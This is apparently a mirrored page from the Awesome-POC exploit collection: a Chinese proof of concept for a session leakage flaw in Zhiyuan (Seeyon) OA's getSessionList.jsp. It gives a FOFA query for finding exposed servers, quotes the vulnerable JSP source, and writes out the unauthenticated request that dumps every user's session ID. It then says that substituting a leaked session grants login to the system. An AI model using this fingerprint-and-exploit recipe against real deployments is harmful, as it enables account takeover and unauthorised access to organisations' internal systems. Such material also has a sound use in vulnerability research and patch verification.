admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/致远OA getSessionList.jsp Session泄漏漏洞.md
Threekiii b7e3b03ac7 更新漏洞库:OA产品漏洞/
2022-05-20 15:57:09 +08:00

64 lines
1.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 致远OA getSessionList.jsp Session泄漏漏洞
## 洞描述
通过使用存在漏洞的请求时会回显部分用户的Session值导致出现任意登录的情况
## 影响版本
未知
## FOFA
```
app="致远互联-OA"
```
## 漏洞复现
出现漏洞的源码
```
<%@ page contentType="text/html;charset=GBK"%>
<%@ page session= "false" %>
<%@ page import="net.btdz.oa.ext.https.*"%>
<%
String reqType = request.getParameter("cmd");
String outXML = "";
boolean allowHttps = true;
if("allowHttps".equalsIgnoreCase(reqType)){
//add code to judge whether it allow https or not
allowHttps = FetchSessionList.checkHttps();
if (allowHttps) response.setHeader("AllowHttps","1");
}
if("getAll".equalsIgnoreCase(reqType)){
outXML = FetchSessionList.getXMLAll();
}
else if("getSingle".equalsIgnoreCase(reqType)){
String sessionId = request.getParameter("ssid");
if(sessionId != null){
outXML = FetchSessionList.getXMLBySessionId(sessionId);
}
}
else{
outXML += "<?xml version=\"1.0\" encoding=\"GB2312\"?>\r\n";
outXML += "<SessionList>\r\n";
// outXML += "<Session>\r\n";
// outXML += "</Session>\r\n";
outXML += "</SessionList>\r\n";
}
out.println(outXML);
%>
```
从上面的代码可知当cmd参数为getAll时便可获取到所有用户的SessionID ,请求
```
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
```
回显Session则存在漏洞
![image-20220520153805805](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201538850.png)
通过替换 Session即可登陆系统
Reference in New Issue View Git Blame Copy Permalink